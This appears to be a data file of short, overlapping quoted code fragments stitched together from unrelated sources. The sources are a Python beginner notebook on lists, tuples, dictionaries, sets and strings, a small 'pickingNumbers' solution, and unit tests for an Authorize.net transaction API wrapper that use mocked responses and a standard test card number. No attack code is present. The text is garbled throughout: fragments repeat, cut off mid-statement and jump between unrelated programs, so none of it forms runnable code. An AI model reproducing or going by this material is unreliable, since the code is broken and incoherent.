print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can", "print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: #", "of mutable element can be changed my_tuple[3][0] = 9 #", "item del my_list[2] print(my_list) # delete multiple items del my_list[1:5]", "# In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing", "my_list # In[14]: # Appending and Extending lists in Python", "11, 13]) print(odd) # In[13]: # Deleting list items my_list", "print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple = (4,", "= [1, 2, 3] # list with mixed data types", "keys my_dict = {'name': 'John', 1: [2, 4, 3]} #", "identical. String_var = 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\"", "'b', 'l', 'e', 'm'] # delete one item del my_list[2]", "a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get", "= 9 # However, item of mutable element can be", "o print(my_list[2]) # Output: e print(my_list[4]) # Nested List n_list", "tuple values my_tuple = (4, 2, 3, [6, 5]) #", "you to explore all the concepts of Python Strings!!! \"\"\"", "item assignment # my_tuple[1] = 9 # However, item of", "Output: e print(my_list[4]) # Nested List n_list = [\"Happy\", [2,", "are identical. String_var = 'Python' String_var = \"Python\" String_var =", "print(my_list) # delete multiple items del my_list[1:5] print(my_list) # delete", "my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])", "'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and its", "can be used for indexing print(my_list[4]) # In[9]: # Appending", "# In[37]: #String and its function # In[38]: # Python", "3} print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1, 2,", "support item assignment # my_tuple[1] = 9 # However, item", "with \"tutorial\" and store in another variable substr_var = String_var.replace(\"document\",", "# nested list my_list = [\"mouse\", [8, 4, 6], ['a']]", "list with mixed data types my_list = [1, \"Hello\", 3.4]", "= {} # dictionary with integer keys my_dict = {1:", "to multiple lines String_var = \"\"\" This document will help", "Dictionary Elements my_dict = {'name': 'Jack', 'age': 26} # update", "2, 3] # list with mixed data types my_list =", "In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple =", "= {'name': 'Jack', 'age': 26} # update value my_dict['age'] =", "# In[9]: # Appending and Extending lists in Python odd", "In[18]: y_dict = {} # dictionary with integer keys my_dict", "('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) #", "with Triple quotes Strings can extend to multiple lines String_var", "my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]:", "print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: #", "2: 'ball'} # dictionary with mixed keys my_dict = {'name':", "[1, 2, 3] # list with mixed data types my_list", "indexing my_list = ['p', 'r', 'o', 'b', 'e'] # Output:", "[2, 0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) #", "cannot have duplicates my_set = {1, 2, 3, 4, 3,", "used for indexing print(my_list[4]) # In[9]: # Appending and Extending", "('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') #", "[] for retrieving elements my_dict = {'name': 'Jack', 'age': 26}", "quotes Strings can extend to multiple lines String_var = \"\"\"", "'b', 'e'] # Output: p print(my_list[0]) # Output: o print(my_list[2])", "'o', 'g', 'r', 'a', 'm', 'i', 'z') # Output: ('p',", "(\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements using indexing", "# In[25]: # set cannot have duplicates my_set = {1,", "# Error! Only integer can be used for indexing print(my_list[4])", "print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary Elements my_dict", "my_list[1:5] print(my_list) # delete entire list del my_list # In[14]:", "{'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name']) # Output:", "y_dict = {} # dictionary with integer keys my_dict =", "# my_tuple[1] = 9 # However, item of mutable element", "= \"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes Strings", "and its method # In[27]: # Tuple having integers my_tuple", "Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can be", "['p', 'r', 'o', 'b', 'l', 'e', 'm'] # delete one", "= ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')", "3)} print(my_set) # In[25]: # set cannot have duplicates my_set", "= ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6])", "{1, 2, 3} print(my_set) # In[24]: my_set = {1.0, \"Hello\",", "update value my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'}", "In[13]: # Deleting list items my_list = ['p', 'r', 'o',", "Deleting list items my_list = ['p', 'r', 'o', 'b', 'l',", "print(my_list) # delete entire list del my_list # In[14]: #", "# Output: 26 print(my_dict.get('age')) # In[21]: # Changing and adding", "my_tuple[1] = 9 # However, item of mutable element can", "= [] # list of integers my_list = [1, 2,", "print(n_list[1][3]) # Error! Only integer can be used for indexing", "In[7]: # nested list my_list = [\"mouse\", [8, 4, 6],", "In[22]: #Sets and its function # In[23]: my_set = {1,", "'Jack'} print(my_dict) # In[22]: #Sets and its function # In[23]:", "items my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']", "Python string examples - all assignments are identical. String_var =", "list items my_list = ['p', 'r', 'o', 'b', 'l', 'e',", "Replace \"document\" with \"tutorial\" and store in another variable substr_var", "3.4] # In[7]: # nested list my_list = [\"mouse\", [8,", "odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting", "(1, 2, 3)} print(my_set) # In[25]: # set cannot have", "multiple lines String_var = \"\"\" This document will help you", "and its function # In[23]: my_set = {1, 2, 3}", "[1, \"Hello\", 3.4] # In[7]: # nested list my_list =", "list my_list = [\"mouse\", [8, 4, 6], ['a']] # In[11]:", "delete one item del my_list[2] print(my_list) # delete multiple items", "my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs []", "# Output: (4, 2, 3, [9, 5]) print(my_tuple) # Tuples", "the concepts of Python Strings!!! \"\"\" # Replace \"document\" with", "# In[30]: # Accessing tuple elements using indexing my_tuple =", "'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and", "delete multiple items del my_list[1:5] print(my_list) # delete entire list", "Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: # Changing", "delete entire list del my_list # In[14]: # Appending and", "del my_list # In[14]: # Appending and Extending lists in", "# However, item of mutable element can be changed my_tuple[3][0]", "[9, 5]) print(my_tuple) # Tuples can be reassigned my_tuple =", "my_dict = {'name': 'Jack', 'age': 26} # update value my_dict['age']", "'r', 'o', 'b', 'l', 'e', 'm'] # delete one item", "1: [2, 4, 3]} # using dict() my_dict = dict({1:'apple',", "integer can be used for indexing print(my_list[4]) # In[9]: #", "assignment # my_tuple[1] = 9 # However, item of mutable", "#Dictionary and function # In[18]: y_dict = {} # dictionary", "print(my_dict) # In[22]: #Sets and its function # In[23]: my_set", "= {'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name']) #", "2, 3, [9, 5]) print(my_tuple) # Tuples can be reassigned", "and its function # In[38]: # Python string examples -", "'John', 1: [2, 4, 3]} # using dict() my_dict =", "coding: utf-8 # In[ ]: #List and function # In[6]:", "Triple quotes Strings can extend to multiple lines String_var =", "# dictionary with integer keys my_dict = {1: 'apple', 2:", "2} print(my_set) # In[26]: #Tuple and its method # In[27]:", "multiple items del my_list[1:5] print(my_list) # delete entire list del", "types my_list = [1, \"Hello\", 3.4] # In[7]: # nested", "#List and function # In[6]: # empty list my_list =", "one item del my_list[2] print(my_list) # delete multiple items del", "reassigned my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm',", "In[6]: # empty list my_list = [] # list of", "[\"Happy\", [2, 0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3])", "= {1, 2, 3, 4, 3, 2} print(my_set) # In[26]:", "In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple", "lines String_var = \"\"\" This document will help you to", "print(my_dict) # add item my_dict['address'] = 'Downtown' # Output: {'address':", "function # In[38]: # Python string examples - all assignments", "5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: #", "= {1: 'apple', 2: 'ball'} # dictionary with mixed keys", "(4, 2, 3, [9, 5]) print(my_tuple) # Tuples can be", "3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]:", "retrieving elements my_dict = {'name': 'Jack', 'age': 26} # Output:", "# Changing and adding Dictionary Elements my_dict = {'name': 'Jack',", "27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets and its function", "\"tutorial\" and store in another variable substr_var = String_var.replace(\"document\", \"tutorial\")", "# Output: e print(my_list[4]) # Nested List n_list = [\"Happy\",", "]: #List and function # In[6]: # empty list my_list", "Error! Only integer can be used for indexing print(my_list[4]) #", "elements my_dict = {'name': 'Jack', 'age': 26} # Output: Jack", "'i', 'z') print(my_tuple) # In[37]: #String and its function #", "# Python string examples - all assignments are identical. String_var", "can be reassigned my_tuple = ('p', 'r', 'o', 'g', 'r',", "3] # list with mixed data types my_list = [1,", "# In[22]: #Sets and its function # In[23]: my_set =", "Output: o print(my_list[2]) # Output: e print(my_list[4]) # Nested List", "# In[23]: my_set = {1, 2, 3} print(my_set) # In[24]:", "and Extending lists in Python odd = [1, 3, 5]" ]
[ "pickingNumbers(a): # Write your code here max = 0 for", "code here max = 0 for i in a: c", "here max = 0 for i in a: c =", "def pickingNumbers(a): # Write your code here max = 0", "for i in a: c = a.count(i) d = a.count(i-1)", "a: c = a.count(i) d = a.count(i-1) e = c+d", "e = c+d if e>max: max = e return max", "max = 0 for i in a: c = a.count(i)", "0 for i in a: c = a.count(i) d =", "your code here max = 0 for i in a:", "a.count(i) d = a.count(i-1) e = c+d if e>max: max", "= a.count(i) d = a.count(i-1) e = c+d if e>max:", "c = a.count(i) d = a.count(i-1) e = c+d if", "i in a: c = a.count(i) d = a.count(i-1) e", "= 0 for i in a: c = a.count(i) d", "= a.count(i-1) e = c+d if e>max: max = e", "# Write your code here max = 0 for i", "Write your code here max = 0 for i in", "a.count(i-1) e = c+d if e>max: max = e return", "in a: c = a.count(i) d = a.count(i-1) e =", "d = a.count(i-1) e = c+d if e>max: max =" ]
[ "= TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen):", "self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45", "'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self):", "'2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) ))", "'000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code':", "'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS)", "TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from", "test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'})", "= self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00'", "self.success params = {'a': '1', 'b': '2'} result = self.api._make_call(params)", "TransactionAPI from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError,", "**kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None, *args,", "'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params =", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError,", "(params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self):", "= self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'", "def setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda *args,", "{}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year),", "= self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'", "self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card)", "}) params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'):", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "'This transaction has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s):", "{}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date':", "get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def", "MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\"", "= self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS)", "'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has", "*args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction", "e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR)", "'45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country':", "'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS)", "'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address", "CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class", "= self.success # Test without specified amount result = self.api.settle('123456')", "def test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card,", "self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self):", "been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params", "import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self,", "approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code':", "'CA', 'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params( {},", "10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456')", "b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS =", "_are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1))", "setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda *args, **kwargs:", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "= self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code':", "urlencode from unittest2 import TestCase import mock from authorizesauce.apis.transaction import", "= MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y')", "SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year", "'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave',", "Test with transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0],", "transaction has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if", "'20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction", "self.success # Test with transaction_id, amount result = self.api.credit('1111', '123456',", "*args, **kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None,", "urlopen): urlopen.side_effect = self.success # Test with transaction_id, amount result", "'90291', 'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address", "Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code':", "'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success", "Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO):", "self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'", "self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911',", "SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;'", "transaction has been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse(", "= { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00',", "b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N',", "'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result", "'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id':", "PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success params =", "Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api =", "\\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs):", "self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success params", "as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' )) self.assertEqual(e.full_response,", "has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR =", "'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params,", "ERROR.seek(0) or ERROR self.year = date.today().year + 10 self.credit_card =", "b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1',", "'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address':", "def test_credit(self, urlopen): urlopen.side_effect = self.success # Test with transaction_id,", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def", "result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&'", "self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&'", "from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\", "def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, {", "ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose", "b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y')", "= CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose Ave',", "b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code':", "'&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result", "BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2", "has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response':", "urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "**kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse(", "**kwargs: ERROR.seek(0) or ERROR self.year = date.today().year + 10 self.credit_card", "return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\"", "'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.',", "test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123',", "'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen):", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) #", "= { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00',", "PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions", "'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect =", "self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA',", "urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0],", "params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year),", "'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This", "AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' ))", "or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR", "self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen')", "result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456'", "self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen):", "'2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816', }", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result", "'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, 